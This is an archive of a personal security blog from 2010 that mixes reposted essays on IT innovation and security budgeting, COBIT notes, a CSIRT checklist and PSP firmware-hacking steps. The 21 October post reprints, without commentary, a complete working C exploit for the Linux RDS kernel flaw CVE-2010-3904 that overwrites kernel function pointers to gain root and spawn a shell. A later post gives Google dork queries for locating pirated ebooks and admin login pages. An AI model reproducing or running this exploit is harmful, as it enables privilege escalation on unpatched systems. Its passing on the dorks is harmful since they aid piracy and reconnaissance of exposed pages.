Tuesday, November 23, 2010

Stop Killing Innovation

I read an interesting post from RICHARD BEJTLICH that talked about "Innovation". I decided to share his post here, enjoy reading.

I hear and read a lot about how IT is supposed to innovate to enable "the business." Anytime I see "IT" in one part of a sentence and "the business" in another, a little part of me dies. Somewhere there is a Nirvana where "thought leaders" understand that there is no business without IT, that IT is as part of the business as the sales person or factory worker or janitor, and that IT would be better off not constantly justifying its existence to "the business." But I digress.


I want to address the "innovation" issue in this post. CIO magazine recently published an interview with Vinnie Mirchandani titled Taking Business Risks With Your IT Budget. I liked what Mr Mirchandani had to say, although I'm going to omit his multiple references to "cloud." Instead, consider how he sees innovation in IT:


More [CIOs] want to be [innovators], but organizations don’t let them...


In the 1980s, we talked about IT as a competitive advantage... In the 1990s, we didn’t hear much of that at all, and IT started reporting to CFOs. In the early 2000s, the CFO made IT a compliance function for auditing and security.


We’ve beaten the innovation out of CIOs at many companies. We want them to be risk mitigators, not innovators. People are afraid to be associated with any failure. They buy IT from vendors that are safe choices. They know they’re overspending, yet they do it anyway...


Mr Mirchandani doesn't say this, but he could have also mentioned that many managers expect CIOs to be "productivity engines," meaning they inherently shrink their budget every year. This drives cost reduction as the primary goal for an IT shop -- not innovation. It's like expecting the business development team to concentrate on decreasing the amount of money spent per new customer acquired, while not caring so much on the quantity or quality of the new customers -- if any!


So what to do?


The best thing they could do is get out from under the CFO. Go to your CEO and say, “I want to report to you.” Make sure the CFO doesn’t stand in the way. Some CIOs will get fired for doing that. Others will get a chance...


Cost pressure isn't limited to those who only report to the CFO, but he doesn't address that issue.


The shocking thing about corporate IT is that without realizing it, 85 percent to 90 percent of the IT spend is with a vendor, including outsourcers and the staff you buy from them...


When you’re spending 90 percent of your money with a vendor, you have only a sliver left for [internal] talent — yet it’s with your own internal talent that you can innovate. There’s very little left for CIOs to innovate with.


The more progressive CIOs are saying they’ve overdone it with outsourcing and are starting to hire their own enterprise architects and business analysts and other strategic resources.


To me this is the crux of the issue. Businesses cannot outsource innovation. Businesses can crush innovation pretty easily though.


I found one comment he made about the cloud to be very interesting:


CIOs resist it. It’s not secure, they say. It’s not always available. CIOs say cloud vendors go down too often.


I know CIOs who haven’t run a full disaster-recovery drill for years and turn around and say that the cloud isn’t production-ready.


So, my message to readers is this: if cost-out, five nines uptime, outsourced workforces, and other failed strategies are your goal, forget innovation. If you want innovation to thrive, try considering the alternatives.


Source: Richard Blog
Reference: CIO - Taking Business Risk with Your IT Budget

Friday, November 12, 2010

COBIT-Framework: Basic Principle

COBIT is an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. COBIT enables clear policy development and good practice for IT control throughout organizations. COBIT emphasizes regulatory compliance, helps organizations to increase the value attained from IT, enables alignment and simplifies implementation of the COBIT framework.

Business orientation is the main theme of COBIT. It is designed not only to be employed by IT service providers, users and auditors, but also, and more important, to provide comprehensive guidance for management and business process owners. The COBIT framework is based on the following principle:

"To provide the information that the enterprise requires to achieve its objectives, the enterprise needs to invest in and manage and control IT resources using a structured set of processes to provide the services that deliver the required enterprise information."

Friday, October 22, 2010

Review for Network Security The Complete Reference

I've been looking for "Onion Methodology" for past few weeks. Network Security The Complete Reference has it.

"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the contingency of pa perimeter security breach occurring."

"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."

Generally, the book is about a comprehensive resource that provide all the information necessary to formulate strategies to obtain and implement a network security program. A five star book.

Thursday, October 21, 2010

Linux RDS Protocol Local Privilege Escalation

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg 
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define RECVPORT 5555 
#define SENDPORT 6666

int prep_sock(int port)
{
 
 int s, ret;
 struct sockaddr_in addr;

 s = socket(PF_RDS, SOCK_SEQPACKET, 0);

 if(s < 0) {
  printf("[*] Could not open socket.\n");
  exit(-1);
 }
 
 memset(&addr, 0, sizeof(addr));

 addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);

 ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

 if(ret < 0) {
  printf("[*] Could not bind socket.\n");
  exit(-1);
 }

 return s;

}

void get_message(unsigned long address, int sock)
{

 recvfrom(sock, (void *)address, sizeof(void *), 0,
   NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
 
 int size, ret;
 struct sockaddr_in recvaddr;
 struct msghdr msg;
 struct iovec iov;
 unsigned long buf;
 
 memset(&recvaddr, 0, sizeof(recvaddr));

 size = sizeof(recvaddr);

 recvaddr.sin_port = htons(RECVPORT);
 recvaddr.sin_family = AF_INET;
 recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

 memset(&msg, 0, sizeof(msg));
 
 msg.msg_name = &recvaddr;
 msg.msg_namelen = sizeof(recvaddr);
 msg.msg_iovlen = 1;
 
 buf = value;

 iov.iov_len = sizeof(buf);
 iov.iov_base = &buf;

 msg.msg_iov = &iov;

 ret = sendmsg(sock, &msg, 0);
 if(ret < 0) {
  printf("[*] Something went wrong sending.\n");
  exit(-1);
 }
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

 if(!fork()) {
   sleep(1);
   send_message(value, sendsock);
   exit(1);
 }
 else {
  get_message(addr, recvsock);
  wait(NULL);
 }

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

 commit_creds(prepare_kernel_cred(0));
 return -1; 

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 struct utsname ver;
 int ret;
 int rep = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   goto fallback;
  oldstyle = 1;
 }

repeat:
 ret = 0;
 while(ret != EOF) {
  if (!oldstyle)
   ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  else {
   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S."))
     continue;
    p = strrchr(sname, '_');
    if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_')
      p--;
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
   fclose(f);
   return addr;
  }
 }

 fclose(f);
 if (rep)
  return 0;
fallback:
 /* didn't find the symbol, let's retry with the System.map
    dedicated to the pointlessness of Russell Coker's SELinux
    test machine (why does he keep upgrading the kernel if
    "all necessary security can be provided by SE Linux"?)
 */
 uname(&ver);
 if (strncmp(ver.release, "2.6", 3))
  oldstyle = 1;
 sprintf(sname, "/boot/System.map-%s", ver.release);
 f = fopen(sname, "r");
 if (f == NULL)
  return 0;
 rep = 1;
 goto repeat;
}

int main(int argc, char * argv[])
{
 unsigned long sec_ops, def_ops, cap_ptrace, target;
 int sendsock, recvsock;
 struct utsname ver;

 printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
 printf("[*] by Dan Rosenberg\n");

 uname(&ver);

 if(strncmp(ver.release, "2.6.3", 5)) {
  printf("[*] Your kernel is not vulnerable.\n");
  return -1;
 } 

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 sec_ops = get_kernel_sym("security_ops");
 def_ops = get_kernel_sym("default_security_ops");
 cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

 if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 /* Calculate target */
 target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));

 sendsock = prep_sock(SENDPORT);
 recvsock = prep_sock(RECVPORT);

 /* Reset security ops */
 printf("[*] Overwriting security ops...\n");
 write_to_mem(sec_ops, def_ops, sendsock, recvsock);

 /* Overwrite ptrace_traceme security op fptr */
 printf("[*] Overwriting function pointer...\n");
 write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

 /* Trigger the payload */
 printf("[*] Triggering payload...\n");
 ptrace(PTRACE_TRACEME, 1, NULL, NULL);
 
 /* Restore the ptrace_traceme security op */
 printf("[*] Restoring function pointer...\n");
 write_to_mem(target, cap_ptrace, sendsock, recvsock);

 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] Got root!\n");
 execl("/bin/sh", "sh", NULL);

}

Security Incident Response Team: CSIRT: Getting Start

Action List for Developing a Computer Security Incident Response Team (CSIRT)
  1. Identify stakeholders1 and participants.
  2. Obtain management support and sponsorship.
  3. Develop a CSIRT project plan.
  4. Gather information.
  5. Identify the CSIRT constituency.
  6. Define the CSIRT mission.
  7. Secure funding for CSIRT operations.
  8. Decide on the range and level of services the CSIRT will offer.
  9. Determine the CSIRT reporting structure, authority, and organizational model.
  10. Identify required resources such as staff, equipment, and infrastructure.
  11. Define interactions and interfaces.
  12. Define roles, responsibilities, and the corresponding authority.
  13. Document the workflow.
  14. Develop policies and corresponding procedures.
  15. Create an implementation plan and solicit feedback.
  16. Announce the CSIRT when it becomes operational.
  17. Define methods for evaluating the performance of the CSIRT.
  18. Have a backup plan for every element of the CSIRT.
  19. Be flexible.

Tuesday, October 5, 2010

Google Dork: eBook

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip)

What does all of this mean? The -inurl htm and -inul html is attempting to get rid of regular webpages and show just index pages. Looking for index of in the title is doing the same. Using the pipe ( | ) tells google to look for something OR something else. Here were are telling google to look for book or ebook directories… and we have listed several common ebook formats (zip, pdf, chf).

If you would like to look for a particular author or title just tack it to the end of your search.

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip) +”o’reilly”

This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.

Google Dork

Google Calc:

Google can also be used as a calculator, here are the few calculator operators that you can
use to perform arithmetic operations in Google.

+ , - , * , / , % of , ^

Goto www.google.com and in the input box, type in the calculation that you want to perform,
something like 8-5, Then you can get the appropriate result. Likewise you can use the rest of
the Calculator operators.

+ and - is not only meant for performing arithmetic operations, but you can use them to narrow down your search. Search for hacking + ebooks this will search for both hacking and ebooks, but gives more priority for ebooks rather that hacking.
Search for hacking – cracking so that you can restrict cracking related sites and info while searching for hacking.

Searching for Phrase ?
If you are searching for a phrase, then don’t forget to enclose it within quotes, it doesn’t matter, whatever the quote is, either single or double quote.
“igconito” or ‘igconito’

Wildcard search:
You can use asterisk operator for wildcard search in Google that find that possible matches either in one or more words that is enclosed in the quotes.
“adm*”

Some other Google Opertors:
Site:

This operator is used for search only one website alone for particular result. hacking info site:www.microsoft.com This query will narrow down your search and will find some hacking related information on the site www.microsoft.com.

Num range:
10….20
When this query is given as input to the google, then it will search for a number that ranges between 10 to 20.

Link:
link:www.microsoft.com
This query will display you, what ever the page that is linked with the site www.microsoft.com.

Related:
related:www.warez.com
What ever the websites that looks similar in contents or related to each other will be displayed as a result of this query.

Cache:
cache:www.ethicaluniversity.com
We can use this cache operator also as a proxy, because once we use this cache operator, Google will be acting as a proxy that stay in middle of the source and the destination.

Site:
site:www.ethicaluniversity.com
Site operator can be used to search whatever that is been indexed in a website.
now this will reveals a lot about this site that got indexed in its server.

allinanchor: Both the link and the allinanchor operator does the same thing, where allinanchor search for keywords that is enclosed in the anchor tag. allinanchor:login

Stocks:
stocks:icici
Using this stocks operator, you can get the current stock details.

Safesearch:
When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google’s SafeSearch screens for sites that contain this type of information and eliminates them from search results. safesearch: keygens + cracks

Phonebook:
This operator will allow you to search phone numbers that Google consider them for quick reference.
phonebook: Disney CA

Info:
This operator cannot be used along with other Google operator.
This can be used for viewing information that Google knows about your site.
info:www.yahoo.com

Filetype:
You can narrow down your search using this filetype operator, if you are seacrhing for a file of specific type.
filetype:pdf “Networks”
This will fetch you some PDF documents or E-Books related to networking.

Google currently supports the following filetypes:
 txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.

Ext:
This is similar to the filetype operator. ext:pdf “Networks”

Define:
If you want to use Google like a Dictionary finding out for meaning or the definitions, you can use the define operator. define:hacking

allintext:
This is somewhat similar to the normal search that most of them do often, you can search for a specific term in google, and can use more number of words enclosed with quotes. allintext:defaced mirror

intitle:
This operator performs search by looking upon the text that is enclosed in the title tag. intitle:”admin login”

allintitle:
You can use only one argument while using the intitle operator, where as you can throw more than one in allintitle operator. intitle:”admin login” “webmaster login” “administrator”

Location:
You can search contents only from selected country websites by specifying the location using the location operator.
inurl:admin.asp location:india
This will fetch you pages that contain admin.asp in its URL and will be from India.

Source:
You can narrow down the search by restricting the source. you can specify the source as a popular E-zines, aricles and even publishers.
“Network Security” source:tata mcgraw hill
This will fetch you results for “Network Security” related topics that was published by tata McGraw Hill publications.

Weather:
weather:chennai This will return you the weather in chennai. likewise you can look for your city.

Conversions:
 you can convert to or from Degrees and Radians using Google.

Number Bases

in hex

in binary

in octal

in decimal

Speed, time and distance conversions

20mph in kph

2 month in minutes

420 kelvin in celsius

5 fahrenheit in celsius

Wednesday, September 8, 2010

PSP slim Hack's

Procedure for firmware 5.03 or below
1.      Update firmware to version 5.03. If the firmware already installed, skip this step.
2.       Download and install official firmware version 5.03.
3.       Download and install chickHEN R2.
4.       Download and install PSPIdent v0.4 or latest.
5.       Continue based on which motherboard you have:

a.       For TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 motherboard:
                                                  i.      Install custom firmware. The most current are:
§  5.00 M33-6
§  5.50 GEN-D3

b.      For TA-088v3 (Partially Hackable) motherboard:
                                                   i.      Install partial custom firmware ONLY. The most current are:
§  CFWEnabler 3.60
§  5.03 GEN-C

Procedure for firmware above 5.03:
1.       Buy/make a Pandora battery & Magic Memory Stick.
2.       Without the Pandora battery inserted, insert the Magic Memory Stick.
3.       Hold "L" shoulder button and insert the Pandora battery.
4.       The green LED light near the power switch should light up.
5.       The onscreen instructions should appear.
6.       Release the "L" shoulder button.


NOTE: If onscreen instructions for installing 5.00 M33-4 appear, then your PSP is COMPLETELY HACKABLE. If nothing appears, then we must assume your PSP is NOT HACKABLE. Follow the remaining steps accordingly.

a.      TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 (Completely Hackable) motherboard:

                                                   i.      Follow the onscreen instructions to install 5.00 M33-4.
                                                 ii.      Ensure M33-4 are completely installed.
                                                iii.      Install 5.50 GEN-D3 or 5.00 M33-6 through Hellcat's Recovery Flasher.

b.      TA-088v3 (Not Hackable)
Sit and wait.

Thursday, June 17, 2010

Google Chrome socks5


1. Paste and save to CAP filetype e.g. my-socks.cap
function FindProxyForURL(url, host) { return "SOCKS5 localhost:8080"; }

2. Configure Proxy Switchy - Auto config URL: file:///D:/security/proxy-tunnel/ucsc-tunnel.cap

3. Done









Tuesday, May 25, 2010

SECURITY METRICS - Attack Surface Metrics

Operational security metrics are the metrics we are most familiar with in our lives. When we measure the height, width, or length of an object we are using an operational metric. When we write the date, have a birthday, or ask the score of a game we are using operational metrics. An operational metric is a constant measurement that informs us of a factual count in relation to the physical world we live in.

They are operational because they are numbers we can work with consistently from day to day and person to person. It is difficult to work with relative or inconsistent measurements like choosing a specific hue of yellow to paint a room, starting work at sunrise, having the right flavor of strawberry for a milkshake, or preparing for the next threat to affect your organization’s profits because the factors have many variables which are biased or frequently changing between people, regions, customs, and locations.

For this reason, many professions attempt to standardize such things like flavors, colors, and work hours. This is done through reductionism, a process of finding the elements of such things and building them up from there by quantifying those elements. This way, colors become frequencies, work hours become hours and minutes, flavors become chemical compounds, and an attack surface becomes porosity, controls, and limitations. So we can now quantify the attack surface as "ravs".

Details at ISECOM

Saturday, May 22, 2010

PHP Security Course

PHP Security Course – Advanced PHP Auditing at Source and Bytecode level

Two weeks after the Month of PHP Security closes Stefan Esser will teach an advanced PHP security course at the SyScan Singapore security conference.

The course will cover advanced methods and techniques for PHP applications audits at source code and at bytecode level. The students will get to know the most common PHP security problems and how to find them at source code and bytecode level. Throughout the course several free and open source software tools will be introduced and used in order to visualize application structure, find security problems with static and dynamic analysis on source code and bytecode level and also to break PHP bytecode encryption.

THC and The Nokia Rom Images

THC and The Nokia Rom Images - 2006-09-06

In mid july Nokia charged THC with copyright infringement and threatened with a lawsuit. THC took down thc.org to prevent further cost and a legal disaster.

A month earlier THC discovered significant security flaws in Nokia's Operating System. To proof it THC published ROM images of 3 phones. THC did not publish the source code or tools but one thing became apparent: To extract the ROM images core security features had to be breached. THC's ability to load kernel modules and gain access to the core of the OS (including the GSM stack) was something Nokia did not like.

At the time of the release THC was not aware of any copyright protected material inside the roms. The question has to be asked if Nokia chosed the right method by threatening THC with a lawsuit or if an email could have achieved the same. Was their concern really copyright infringement? The software in the rom-images could not be used, not be ported and not be run on any other mobile phone. In addition all software is already available on every phone. Phones that are given away by the mobile operators for 1 Euro or sometimes even for free. So if everyone has access to the software anyway what is the point in threatening THC? What was their real intend? We might never find out. But what we know is that they managed to silence THC for a month.

If this is professional practice? We do not know. It is certainly the practice that Nokia chose. We also know that no attempt was made by Nokia to inquire about the security vulnerability. We also know that Nokia did not provide any updates for their customers.

Making sure that the hardware we purchase is secure is not a crime. In fact taking a look at what we buy should be our duty. We should not trust big corporates who claim in TV advertisements how secure and safe our data is. We have to test it and proof them wrong whenever we can.

In fact researchers should demand that manufactures like Nokia must provide full documentation of their hardware. The buyer becomes the owner of the mobile phone and thus has the right to know how to program the hardware. Nokia does not provide any of such information. Free software or a different operating system can not be used because of limited access to documentation. This is a classic example of a hardware giant allowing only his own software to be used. This is what some people would consider a Monopoly and an abuse of power.

THC is deeply concerned that Nokia did not choose the diplomatic route.

Source: http://freeworld.thc.org/thc-rom/

Friday, May 21, 2010

Something to quote

"Software is like sex. It's better when it's free." -- Linus Torvalds
"A chain is only as strong as its weakest link." -- Charles A. Lindberg
"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
"There are always errors in real data." -- The AWK Programming Language
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous

Monday, April 26, 2010

Operation Aurora

Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009.[1] The attack was first publicly disclosed by Google on January 12, 2010, in a blog post.[2] In the blog post, Google said the attack originated in China.

The attack has been aimed at dozens of other organizations, of which Adobe Systems,[3] Juniper Networks[4] and Rackspace[5] have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman and Dow Chemical[6] were also among the targets.

As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.[2] Official Chinese media responded stating that the incident is part of a U.S. government conspiracy.[7]

The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee. Research by McAfee Labs discovered that “Aurora” was part of the file path on the attacker’s machine that was included in two of the malware binaries McAfee said were associated with the attack. "We believe the name was the internal name the attacker(s) gave to this operation," McAfee Chief Technology Officer George Kurtz said in a blog post.[8]

According to McAfee, the primary goal of the attack was to gain access to and potentially modify source code repositories at these high tech, security and defense contractor companies. “[The SCMs] were wide open,” says Dmitri Alperovitch, McAfee’s vice president for threat research. “No one ever thought about securing them, yet these were the crown jewels of most of these companies in many ways — much more valuable than any financial or personally identifiable data that they may have and spend so much time and effort protecting."[9]

Source: Wikipedia

Monday, March 22, 2010

Forget ROI and risk. Consider competitive advantage

1. "ROI-centric discussion"

Security person: Hello boss. We need to implement our security program because it has a ROI of $1 million dollars.
Boss: You mean if we adopt your program we're going to earn $1 million dollars?
Security person: No, we'll save $1 million.
Boss: Get out of my office. Come back after you've taken a finance class.



2. "Risk-centric discussion"

Security person: Hello boss. We need to implement our security program because I've calculated our risk to be 1.35.
Boss: What does that mean?
Security guy: Hmm, ok I'll leave now.



3. "Competitiveness discussion"

Security person: Hello boss. We need to implement our security program because it will provide a competitive advantage to our businesses.
Boss: That's a new one. Tell me more.
Security person: We have adversaries who try to steal, and sometimes do steal, our data.
Boss: So what. Isn't it just World of Warcraft credentials?
Security person: Our adversaries steal intellectual property like design plans, pricing data, negotiation strategies, and other information which means they might understand our business as well as we do.
Boss: Is that true? You mean we could lose deals because our products are copied, our bids undercut, our positions already known? I wonder if that's why we lost a deal to MegaCorp last month...
Security person: Now that you mention it, here is a report on suspicious computer activity involving MegaCorp last week. Our team managed to interdict their theft attempt, but in the future we'd like to be able to detect and respond faster, as well as make it more difficult for the adversary to have a chance to steal our information.
Boss: Now you're talking. Sit down, let's discuss this.



"Notice what happened here. Magazines written for CIOs, CTOs, CISOs, and so on constantly advocate "speaking the language of the business." Unfortunately this "language" has been assumed to be finance. As a result security people tried to shoehorn their projects into ROI or ROSI, to laughable results.

As we've seen during the last few years, "risk" has turned out to be a dead end too. The numbers mean nothing. Even if you could somehow measure risk, it's easy enough for managers to accept a higher level of risk than the security manager.

Competitiveness, on the other hand, is everything to business people. They are constantly looking for an edge. It a tight economy, gaining an advantage over the competition could mean the difference between thriving or going out of business.


Notice that discussing competitiveness also avoids the death spiral associated with ROI discussions: cost. When conversation is ROI-centric, digital security is perceived as being a loss prevention exercise and a cost center. IT in general is often seen in this light. Don't dump money in a cost center -- cut spending instead!


When you turn the focus on the adversary -- you are threat-centric -- and discuss how he is trying to beat you and how you can beat him, you are likely to strike a primal chord in the mind of the business person. The executive is likely to wonder "what else can we do to give us a competitive advantage?" Suddenly the digital security shop is seen as a business partner in a common fight with the competition, not a cost center dragging down the "productive" elements of the business.

This isn't a new idea, but it's largely absent in the mindshare of digital security professionals. (If anyone has an ACM account I'd like to read
Using information security to achieve competitive advantage by Charles Cresson Wood, 1991.) In addition to mentioning ROI and risk, it's important to remember that compliance is the other driver that is likely to justify funding. However, I believe we are more likely to see security shops spending resources explaining why their current activities meet regulatory requirements. I doubt new programs are going to be created to meet compliance needs, since compliance is basically a ten-year-old justification at this point."

- source taosecurity

Wednesday, March 10, 2010

Advice for Academic Researchers

Quoted from TaoSecurity Blog's

A blog and book reader emailed the following question:

I am an info sec undergrad and have been granted a scholarship to continue my studies towards a phd with the promise of DoD service at the other end. It is critical for me to research and select the most important area of security from the Defense Department's perspective.

My question to you is this: Drawing upon your knowledge, what specific area(s) of information security do you feel will be most critical in the next several years (especially in the eyes of the Dept. of Defense)?


I post this question because I'm sure blog readers will contribute interesting comments.

For my part, I'm really interested in the following: characterizing network traffic. In other words, develop tools and techniques to describe what is happening on the network. (I'm sure a few commercial vendors think they are doing this already, but nothing approaches the level that we really need.)

Without understanding what is happening, we can't decide if the activity is normal, suspicious, or malicious. Current approaches are far too primitive and limited. This work is not as "shiny" as developing a new detection algorithm, but getting back to basics is the sort of approach that could survive in a research environment.